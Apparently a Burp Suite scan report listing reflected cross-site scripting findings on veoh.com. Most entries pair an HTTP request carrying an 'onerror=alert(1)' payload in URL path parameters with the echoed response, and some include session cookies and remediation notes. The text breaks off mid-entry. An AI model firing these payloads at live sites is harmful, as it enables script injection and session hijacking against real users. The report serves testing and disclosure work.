GET /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr218d8'%3b167cb8b726a HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:35:35 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=69 Content-Length: 94329
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a was submitted in the REST URL parameter 4. This input was echoed as 1b947"><img src=a onerror=alert(1)>1a22388a0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:34:23 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=75 Content-Length: 57867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure4957f1b947"><img src=a onerror=alert(1)>1a22388a0a/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 was submitted in the REST URL parameter 4. This input was echoed as 265a6<img src=a onerror=alert(1)>59b74d09c35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:07 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=97 Content-Length: 57833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure4957f265a6<img src=a onerror=alert(1)>59b74d09c35"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the name of an HTML tag attribute. The payload f915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7 was submitted in the REST URL parameter 4. This input was echoed as f915b><img src=a onerror=alert(1)>991aab001b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f"><img%20srcf915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:35:18 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=40 Content-Length: 76933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <img srcf915b><img src=a onerror=alert(1)>991aab001b7=a onerror=alert(1)> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35 was submitted in the REST URL parameter 4. This input was echoed as ddc51<img src=a onerror=alert(1)>095a10c6f35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:14 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=93 Content-Length: 76573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_ddc51<img src=a onerror=alert(1)>095a10c6f35=a onerror=alert(1)> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee was submitted in the REST URL parameter 4. This input was echoed as 94381<img src=a onerror=alert(1)>52a0288ccee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d81594381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee/watch/v18978294NGnK88j8/a HTTP/1.1 Host: www.veoh.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a was submitted in the REST URL parameter 4. This input was echoed as ba538"><img src=a onerror=alert(1)>0ced7d2746a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/animationba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a/watch/v20767083WdnCj7gW HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:28 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=12 Content-Length: 74545
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/animationba538"><img src=a onerror=alert(1)>0ced7d2746a/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d was submitted in the REST URL parameter 4. This input was echoed as cd065<img src=a onerror=alert(1)>a077cbaf92d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/animationcd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d/watch/v20767083WdnCj7gW HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:51 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=18 Content-Length: 74501
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_animationcd065<img src=a onerror=alert(1)>a077cbaf92d"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14c7e'%3b1844de9a605 was submitted in the REST URL parameter 6. This input was echoed as 14c7e';1844de9a605 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/animation/watch/v20767083WdnCj7gW14c7e'%3b1844de9a605 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:39:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=96 Content-Length: 93332
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1 was submitted in the REST URL parameter 4. This input was echoed as fcae8"><img src=a onerror=alert(1)>26d66e628b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/celebrity_and_showbizfcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1/watch/v20767641DYmkkC9T HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:07 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=50 Content-Length: 77572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/celebrity_and_showbizfcae8"><img src=a onerror=alert(1)>26d66e628b1/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160 was submitted in the REST URL parameter 4. This input was echoed as fb1e3<img src=a onerror=alert(1)>01b1c12b160 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/celebrity_and_showbizfb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160/watch/v20767641DYmkkC9T HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:47 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=9 Content-Length: 77528
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_celebrity_and_showbizfb1e3<img src=a onerror=alert(1)>01b1c12b160"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e231'%3bf41ab2e3621 was submitted in the REST URL parameter 6. This input was echoed as 3e231';f41ab2e3621 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T3e231'%3bf41ab2e3621 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=98 Content-Length: 99706
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1 was submitted in the REST URL parameter 4. This input was echoed as 1b1b0<img src=a onerror=alert(1)>1aed6fadab1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/educational_and_howto1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1/watch/v20767155HXCcYkcJ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:45 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90 Content-Length: 78324
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_educational_and_howto1b1b0<img src=a onerror=alert(1)>1aed6fadab1"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d was submitted in the REST URL parameter 4. This input was echoed as aa06e"><img src=a onerror=alert(1)>7b8d668185d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
